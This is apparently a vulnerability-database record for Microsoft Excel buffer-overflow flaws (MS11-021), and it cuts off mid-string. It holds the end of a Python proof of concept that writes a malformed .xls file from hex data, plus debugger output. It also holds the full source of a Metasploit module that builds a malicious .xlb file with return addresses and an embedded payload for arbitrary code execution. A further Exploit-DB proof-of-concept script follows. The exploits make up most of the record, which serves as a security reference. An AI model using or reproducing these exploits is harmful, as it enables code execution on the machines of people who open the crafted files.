\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"0000000000000000000000000000000000000000000000000feff0000050102000000000000\" \nwD+=\"00000000000000000000000100000002d5cdd59c2e1b10939708002b2cf9ae3000000028010\" \nwD+=\"0000900000001000000500000000f0000005800000017000000880000000b00000090000000\" \nwD+=\"100000009800000013000000a000000016000000a80000000d000000b00000000c000000050\" \nwD+=\"1000002000000e40400001e0000002800000054686520477265617465722047686574746f20\" \nwD+=\"466162756c6f757320466f756e646174696f6e000003000000d31a0a000b000000000000000\" \nwD+=\"b000000000000000b000000000000000b000000000000001e1000000800000004000000616c\" \nwD+=\"6c000300000063770003000000687700050000007175697a000500000074657374000500000\" \nwD+=\"073746174000a000000646576696174696f6e000a000000617667206772617068000c100000\" \nwD+=\"020000001e0000000b000000576f726b7368656574730003000000080000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000010000000\" \nwD+=\"2000000030000000400000005000000060000000700000008000000090000000a0000000b00\" \nwD+=\"00000c0000000d0000000e0000000f000000100000001100000012000000130000001400000\" \nwD+=\"015000000160000001700000018000000190000001a0000001b0000001c0000001d0000001e\" \nwD+=\"0000001f0000002000000021000000220000002300000024000000250000002600000027000\" \nwD+=\"00028000000290000002a0000002b0000002c0000002d0000002e0000002f00000030000000\" \nwD+=\"3100000032000000330000003400000035000000360000003700000038000000390000003a0\" \nwD+=\"000003b0000003c0000003d0000003e0000003f000000400000004100000042000000feffff\" \nwD+=\"ff4400000045000000460000004700000048000000490000004a000000feffffff4c0000004\" \nwD+=\"d0000004e0000004f000000500000005100000052000000fefffffffdfffffffeffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"ffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720\" \nwD+=\"079000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"00000000000000000016000501ffffffffffffffff020000002008020000000000c00000000\" \nwD+=\"000004600000000000000000000000000f9dd43b205cc01feffffff00000000000000005700\" \nwD+=\"6f0072006b0062006f006f006b0000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000012000201ffffffffffffffffff\" \nwD+=\"ffffff000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000002b850000000000000500530075006d006d0061007200790049006e0066006f00\" \nwD+=\"72006d006100740069006f006e0000000000000000000000000000000000000000000000000\" \nwD+=\"00000280002010100000003000000ffffffff00000000000000000000000000000000000000\" \nwD+=\"0000000000000000000000000000000000430000000010000000000000050044006f0063007\" \nwD+=\"5006d0065006e007400530075006d006d0061007200790049006e0066006f0072006d006100\" \nwD+=\"740069006f006e000000000000000000000038000201ffffffffffffffffffffffff0000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000004b00000000\" \nwD+=\"10000000000000\" \n \n \nFILE = open('webDEViL-CVE-2011-0978.xls',\"wb\") \nbacktobin=binascii.unhexlify(wD) \nFILE.write(backtobin) \nFILE.close() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/100978/msoexcel-overflow.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-11T20:15:31", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results in arbitrary code execution under the context of the user.\n", "modified": "2017-09-22T23:49:09", "published": "2011-11-05T23:05:42", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS11_021_XLB_BOF", "href": "", "type": "metasploit", "title": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. This results in arbitrary code execution under the context of\n the user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Aniway', # Initial discovery (via ZDI)\n 'Unknown', # Abysssec, RCA, poc\n 'sinn3r', # Metasploit\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2011-0105'],\n ['OSVDB', '71765'],\n ['MSB', 'MS11-021'],\n ['ZDI', '11-121']\n ],\n 'Payload' =>\n {\n 'StackAdjustment' => -3500,\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n 'DisablePayloadHandler' => 'true',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Win XP SP3 (Vista and 7 will try to repair the file)\n ['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)\n ['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 9 2011\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The filename', 'msf.xlb'])\n ])\n end\n\n def exploit\n path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-0105.xlb')\n f = File.open(path, 'rb')\n template = f.read\n f.close\n\n p = payload.encoded\n\n # Offset 1556\n record = ''\n record << \"\\xa7\\x00\" #record type\n record << \"\\x04\\x00\" #record length\n if target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2\n record << \"\\xb0\\x0d\\x0c\\x00\" #data\n else\n record << \"\\xb0\\x0f\\x0c\\x00\" #data\n end\n\n # Offset 1564\n continue_record = ''\n continue_record << \"\\x3c\\x00\" #record type\n continue_record << [p.length+32].pack('v') #length\n\n buf = ''\n buf << template[0, 1556]\n buf << record\n buf << continue_record\n buf << rand_text_alpha(1)\n buf << [target.ret].pack('V*')\n buf << \"\\x00\"*12\n buf << p\n buf << template[2336, template.length]\n\n file_create(buf)\n end\nend\n\n=begin\n0:000> r\neax=41414141 ebx=00000000 ecx=00000006 edx=008c1504 esi=0000007f edi=00000005\neip=301a263d esp=00137ef8 ebp=00137f6c iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nEXCEL!Ordinal40+0x1a263d:\n301a263d 8908 mov dword ptr [eax],ecx ds:0023:41414141=????????\n0:000> dc esp\n00137ef8 00000000 00000000 41414141 41414141 ........AAAAAAAA\n00137f08 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00137f18 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00137f28 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00137f38 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00137f48 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00137f58 41414141 41414141 41414141 00000000 AAAAAAAAAAAA....\n00137f68 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb"}], "exploitdb": [{"lastseen": "2016-02-02T07:28:17", "bulletinFamily": "exploit", "description": "Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC. CVE-2011-0978. Dos exploit for windows platform", "modified": "2011-04-29T00:00:00", "published": "2011-04-29T00:00:00", "id": "EDB-ID:17227", "href": "https://www.exploit-db.com/exploits/17227/", "type": "exploitdb", "title": "Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC", "sourceData": "\"\"\"\r\nThis is a PoC for MS11-021/CVE-2011-0978\r\nMicrosoft Office Excel Axis Properties Record Parsing Buffer Overflow\r\nw3bd3vil[at]gmail[dot].com\r\ntwitter.com/w3bd3vil\r\n\r\nModify bits at file location 0x39E7\r\n\r\n0:000:x86> r\r\neax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554\r\neip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\n2f36a2d5 33d2 xor edx,edx\r\n2f36a2d7 53 push ebx\r\n2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h]\r\n2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx\r\n2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch]\r\n2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78)\r\n2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx\r\n2f36a2ed 56 push esi\r\n2f36a2ee 57 push edi\r\n2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95)\r\n2f36a2f5 395514 cmp dword ptr [ebp+14h],edx\r\n2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321)\r\n2f36a2fa 8b4010 mov eax,dword ptr [eax+10h]\r\n2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????\r\n2f36a300 3bc2 cmp eax,edx\r\n2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329)\r\n2f36a304 0fb738 movzx edi,word ptr [eax]\r\n2f36a307 8d4c3f02 lea ecx,[edi+edi+2]\r\n2f36a30b 51 push ecx\r\neax here points to location in the file 0xFB4.\r\n0:000:x86> dd eax\r\n04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318\r\n04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8\r\n04dd63a0 04dd03e0 00000000 00000001 00000001\r\n04dd63b0 00000001 00000001 00000001 00000001\r\n04dd63c0 00000001 00000001 00000001 00000000\r\n04dd63d0 00000000 00000000 00000000 00000000\r\n04dd63e0 00000000 00000000 00000000 00000000\r\n04dd63f0 00000000 00000000 00000000 00000000\r\n0:000:x86> dd 0376ec80\r\n0376ec80 00630009 0061006c 00730073 006f0077\r\n0376ec90 006b0072 eaf10000 00770009 00720061\r\n0376eca0 0075006d 00200070 00350023 eaf10000\r\n0376ecb0 0283eb30 6666ce60 0283eb40 6666c960\r\n0376ecc0 0283eb4c 6666c960 0000f80c 00000000\r\n0376ecd0 00006338 00000000 00000001 00000000\r\n0376ece0 0283eb98 6666ce60 0283eba4 6666c960\r\n0376ecf0 0283ebb0 6666c960 00000000 00000000\r\n\r\nwebDEViL\r\n\"\"\"\r\nimport binascii\r\n\r\n\r\nwD=\"d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000\"\r\nwD+=\"000000000000001000000540000000000000000100000feffffff00000000feffffff000000\"\r\nwD+=\"0053000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"\r\nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffff0908100000060500e228cd07c9\"\r\nwD+=\"c0000006020000e1000200b004c10002000000e20000005c0070000800004e49492d54524c5\"\r\nwD+=\"420202020202020202020202020202020202020202020202020202020202020202020202020\"\r\nwD+=\"202020202020202020202020202020202020202020202020202020202020202020202020202\"\r\nwD+=\"0202020202020202020202020202020202020202020202020202042000200b0046101020000\"\r\nwD+=\"00c00100003d011000010002000300040005000600090008009c0002000e001900020000001\"\r\nwD+=\"20002000000130002000000af0102000000bc01020000003d001200e7fa2c013e2b2d1e3800\"\r\nwD+=\"00000000010058024000020000008d00020000002200020000000e0002000100b7010200000\"\r\nwD+=\"0da000200000031001a00c8000000ff7f9001000000000000050141007200690061006c0031\"\r\nwD+=\"001a00c8000000ff7f9001000000000000050141007200690061006c0031001a00c8000000f\"\r\nwD+=\"f7f9001000000000000050141007200690061006c0031001a00c8000000ff7f900100000000\"\r\nwD+=\"0000050141007200690061006c0031001a00a0000000ff7f900100000000000005014100720\"\r\nwD+=\"0690061006c0031001a00c80004000c009001000001000000050141007200690061006c0031\"\r\nwD+=\"001a00c800040024009001000001000000050141007200690061006c0031001c00a0000000f\"\r\nwD+=\"f7f900100000002000006015400610068006f006d00610031001a00dc000000ff7f90010000\"\r\nwD+=\"00020000050141007200690061006c0031001a009a010000ff7f90010000000000000501410\"\r\nwD+=\"07200690061006c0031001a009a010000ff7f9001000000000000050141007200690061006c\"\r\nwD+=\"0031001a0022010000ff7f9001000000020000050141007200690061006c0031001a00bd010\"\r\nwD+=\"000ff7f9001000000000000050141007200690061006c0031001a00bd010000ff7f90010000\"\r\nwD+=\"00000000050141007200690061006c0031001a00c80001000a00bc020000000200000501410\"\r\nwD+=\"07200690061006c0031001a00a0000000ff7f9001000000020000050141007200690061006c\"\r\nwD+=\"0031001a00c80000000a009001000000020000050141007200690061006c0031001a00c8000\"\r\nwD+=\"0000c009001000000020000050141007200690061006c0031001a00c8000100ff7fbc020000\"\r\nwD+=\"00020000050141007200690061006c0031001a00c80001000900bc020000000200000501410\"\r\nwD+=\"07200690061006c001e041c000500170000222422232c2323305f293b5c28222422232c2323\"\r\nwD+=\"305c291e04210006001c0000222422232c2323305f293b5b5265645d5c28222422232c23233\"\r\nwD+=\"05c291e04220007001d0000222422232c2323302e30305f293b5c28222422232c2323302e30\"\r\nwD+=\"305c291e0427000800220000222422232c2323302e30305f293b5b5265645d5c28222422232\"\r\nwD+=\"c2323302e30305c291e0437002a003200005f282224222a20232c2323305f293b5f28222422\"\r\nwD+=\"2a205c28232c2323305c293b5f282224222a20222d225f293b5f28405f291e042e002900290\"\r\nwD+=\"0005f282a20232c2323305f293b5f282a205c28232c2323305c293b5f282a20222d225f293b\"\r\nwD+=\"5f28405f291e043f002c003a00005f282224222a20232c2323302e30305f293b5f282224222\"\r\nwD+=\"a205c28232c2323302e30305c293b5f282224222a20222d223f3f5f293b5f28405f291e0436\"\r\nwD+=\"002b003100005f282a20232c2323302e30305f293b5f282a205c28232c2323302e30305c293\"\r\nwD+=\"b5f282a20222d223f3f5f293b5f28405f291e040b00a400060000302e303030301e040a00a5\"\r\nwD+=\"00050000302e3030301e040800a600030000302e30e000140000000000f5ff2000000000000\"\r\nwD+=\"00000000000c020e000140001000000f5ff200000f40000000000000000c020e00014000100\"\r\nwD+=\"0000f5ff200000f40000000000000000c020e000140002000000f5ff200000f400000000000\"\r\nwD+=\"00000c020e000140002000000f5ff200000f40000000000000000c020e000140000000000f5\"\r\nwD+=\"ff200000f40000000000000000c020e000140000000000f5ff200000f40000000000000000c\"\r\nwD+=\"020e000140000000000f5ff200000f40000000000000000c020e000140000000000f5ff2000\"\r\nwD+=\"00f40000000000000000c020e000140000000000f5ff200000f40000000000000000c020e00\"\r\nwD+=\"0140000000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f